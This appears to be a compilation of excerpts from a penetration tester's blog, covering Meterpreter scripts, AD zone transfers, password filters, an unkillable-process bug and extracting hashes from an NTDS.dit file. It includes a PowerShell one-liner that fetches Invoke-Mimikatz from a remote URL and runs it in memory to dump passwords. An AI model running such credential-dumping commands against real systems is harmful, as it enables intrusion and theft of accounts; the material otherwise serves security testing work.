Since I’ve been gone, OJ has released the ExtAPI (Extended API) for Meterpreter. This has some pretty amazing functionality. You can find OJ’s write-up on it (and more amazing things he did in 3 months of Meterpreter) and on the Metasploit blog. Just brushing the surface, and to help people see the power of this new functionality, I went ahead and created a few Meterpreter scripts that can really mess with someone.
I’ve taken a rather long hiatus from blogging. This is mostly because I was fed up with the blogging platform that I had (Squarespace) and didn’t really have any alternatives that met all of the features I wanted. So, where am I at now? Github, actually. Github allows users to create “Github Pages” for repositories (or be its own repo). For the most part these pages are written in Markdown. It’s late and I don’t feel like looking up who, but someone created a project called “Jekyll”, which is a Ruby-based static page generator, and then another project called “Octopress” popped up using Jekyll to create a static HTML-based blogging platform.
clymb3r recently posted a script called “Invoke-Mimikatz.ps1”. Basically what it does is reflectively inject mimikatz into memory, call for all the logonPasswords and exit. It even checks the target’s architecture (x86/x64) first and injects the correct DLL. You can very easily use this script directly from an admin command prompt like so:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

(This works REALLY well for Citrix and Kiosk scenarios and it’s too hard to type/remember.) This runs the PowerShell script by directly pulling it from Github and executing it “in memory” on your system.
cross posted from: http://carnal0wnage.attackresearch.com/2013/10/ad-zone-transfers-as-user.html

The tried and true methods for Zone Transfers use either nslookup:

nslookup
ls -d domain.com.local

Or dig:

dig -t AXFR domain.com.local @ns1.domain.com.local

In the Windows Enterprise world there are a few more options. If you are a DNS Admin you can use the ‘dnscmd’ command like so:

dnscmd /EnumZones
dnscmd /ZonePrint domain.com.local

Which is handy if you can pop the DNS server (usually the Domain Controller, so you usually have better things to do at that point).
Password Filters are a way for organizations and governments to enforce stricter password requirements on Windows accounts than those available by default in Active Directory Group Policy. It is also fairly well documented how to install and register Password Filters. Basically what it boils down to is updating a registry key here: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages with the name of a DLL (without the extension) that you place in Windows\System32.
If you’ve ever used proxychains to push things through Meterpreter, one of the most annoying things is its “hardcoded” DNS setting of 126.96.36.199. If the org that you are going after doesn’t allow this out of their network, or if you are trying to resolve an internal asset, you’re SOL. After a ton of googling and annoyed head slams into walls every time I forget where this is, I’ve finally decided to make a note of it.
Saw this post about a kernel bug in 64-bit Windows that is a DoS; it can also create an unkillable process: Blog post: http://waleedassar.blogspot.com/2013/02/kernel-bug-1-processiopriority.html Figured I’d take a swing at making a module that I could use to put Meterpreter into an unkillable state. Good times at CCDC could be had. Started with the C code for the bug: http://pastebin.com/QejGQXib along with the only resource I could find about the actual function: http://processhacker.
The problem is that everyone does this whole blogging thing in so many different ways. Me, personally? I like to have a client that I can save drafts in, work on things a little bit here and there, and then finalize stuff when I’m ready to post. I have a couple dozen of these posts ready and set with final tweaks needed, but my blogging software Squarespace up and moved on to “Squarespace 6”.
Part 2, we have the NTDS.dit file and the SYSTEM hive file. First we need a few tools:

From: http://www.ntdsxtract.com/
Download: http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

From: http://code.google.com/p/libesedb/
Download: https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz
wget https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz

Extract the tools:

tar zxvf libesedb-alpha-20120102.tar.gz
unzip ntdsxtract_v1_0.zip

Compile/make libesedb:

root@wpad:~/blog/# cd libesedb-20120102
root@wpad:~/blog/libesedb-20120102# ./configure
root@wpad:~/blog/libesedb-20120102# make

Export the tables from NTDS.dit:

root@wpad:~/blog/libesedb-20120102# cd esedbtools/
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport
esedbexport 20120102

Missing source file.

Use esedbexport to export items stored in an Extensible Storage Engine (ESE) Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ] [ -T table_name ] [ -hvV ] source

source: the source file
-c: codepage of ASCII strings, options: ascii, windows-874, windows-932, windows-936, windows-1250, windows-1251, windows-1252 (default), windows-1253, windows-1254 windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default) 'all' exports all the tables or a single specified table with indexes, 'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to (default is the source filename) esedbexport will add the suffix .